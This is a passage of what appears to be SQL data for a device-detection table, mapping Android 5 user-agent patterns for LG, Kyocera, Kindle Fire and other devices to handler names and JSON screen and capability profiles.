Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; J3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; J7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; JCI VA-10J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; JY-S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Joy HG5024M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K013) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K4000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K4000_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K4000_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; K6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KENEKSI_Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_keneksi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFARWI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFARWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFASWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFAUWI) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFAUWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFDOWI) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFDOWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFFOWI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFFOWI) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFFOWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFGIWI) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFGIWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFMEWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFSAWA) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFSAWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFSUWI) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFSUWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KFTBWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KING 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KING 7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KIW-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KIW-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KIW-L24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KM0434) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KOMU K70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYF31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYOCERA-C6742) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYOCERA-C6742A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYOCERA-C6745) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYOCERA-E6560) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYOCERA-E6790) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; KYV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Kylin 4.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; L-EMENT551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; L-ITE 552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; L52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; L697) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LENNY2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LEO_DG280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-AS330) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D335) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D337) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D390n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D415) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D610AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D610TR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D618) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D620/V20d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D620/V20e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D631) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D690) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D690n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D693TR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D693n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D722) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D722-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D722AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D722v/V20c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D723) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D724) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D725) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D802/V30d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D806) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LG-D838) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 